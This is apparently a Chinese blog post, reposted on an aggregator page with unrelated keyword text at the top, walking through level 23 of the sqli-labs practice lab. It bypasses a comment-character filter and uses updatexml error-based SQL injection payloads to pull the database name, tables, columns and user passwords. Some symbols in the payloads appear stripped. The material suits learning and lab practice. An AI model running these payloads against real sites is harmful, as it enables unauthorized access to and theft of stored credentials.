长安做网站价格国外做的比较好看的网站

bicheng/2026/1/24 18:11:40/文章来源:

长安做网站价格,国外做的比较好看的网站,李江seo,上海外贸股票文章目录前言一、回顾前几关知识点二、靶场第二十三关通关思路1、判断注入点2、爆数据库名3、爆数据库表4、爆数据库列5、爆数据库关键信息总结前言此文章只用于学习和反思巩固sql注入知识#xff0c;禁止用于做非法攻击。注意靶场是可以练习的平台#xff0c;不能随意去… 文章目录前言一、回顾前几关知识点二、靶场第二十三关通关思路1、判断注入点2、爆数据库名3、爆数据库表4、爆数据库列5、爆数据库关键信息总结前言此文章只用于学习和反思巩固sql注入知识禁止用于做非法攻击。注意靶场是可以练习的平台不能随意去尚未授权的网站做渗透测试一、回顾前几关知识点前几关是基于http头部注入由于开发人员为了方便记录用户cookie、xff、user-agent、referer等头部信息与数据库交互但是没有严格过滤这些参数导致攻击者可以拼接任意sql语句到数据库中实现非法数据库查询。这一关是开始有过滤敏感字符了。二、靶场第二十三关通关思路 1、判断注入点2、爆数据库名3、爆数据库表4、爆数据库列5、爆数据库关键信息 1、判断注入点这一关又回到了前10关的get提交的注入了老规矩输入万能语句 and 11 和and 12 发现页面均正常说明不是数字型。直接提交一个单引号发现报错了(如图所示)报错信息为 Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\tools\phpstudy_pro\WWW\sqli-labs\Less-23\index.php on line 38 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘1’’ LIMIT 0,1’ at line 1 我们进一步猜想看看是不是单引号我们构造payload 1 and 11--1 and 12--发现居然都是报错按道理应该是11是正常的12才是页面异常难道是我们的思路错了吗我们仔细观察他页面异常还是单引号闭合的问题还是因为多了一个单引号导致sql查询语句错误。所以这里应该是注释符的问题他没有把后面多的单引号过滤掉。本来应该是id1’ and 11–的。所以考虑是注释符被过滤了看源码发现注释符确实被过滤了被替换为空了如图所示) 所以我们不能用注释符构造payload了注释符的作用其实就是为了闭合多余的一个单引号让我们payload顺利拼接到数据库查询。既然用不了那我们自己闭合。 payload为 1 and 11payload这样就能成功解决多一个单引号的问题了带入数据库的语句这样就不会报错id1 and 11(如图所示) 2、爆数据库名这里由于不知道显位order by闭合payload不知道显位是多少个这里我就用报错注入了。这里后面加or ‘1’1是为了闭合多余的单引号。 payload为 1 and updatexml(1,concat(0x3a,(select database()),0x3a),1) or 113、爆数据库表 payload为 1 or updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schemadatabase() limit 3,1),0x3a),1) or 114、爆数据库列 payload为 1 or updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 1,1),0x3a),1) or 111 or updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 2,1),0x3a),1) or 115、爆数据库关键信息 payload为 1 or updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1) or 111 or updatexml(1,concat(0x3a,(select username from users limit 0,1),0x3a),1) or 11总结这一关是一个get提交的单引号闭合的注入与之前不同的是这一关注释符被过滤为空了我们得自己构造闭合。此文章是小白自己为了巩固sql注入而写的大佬路过请多指教

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/bicheng/87123.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！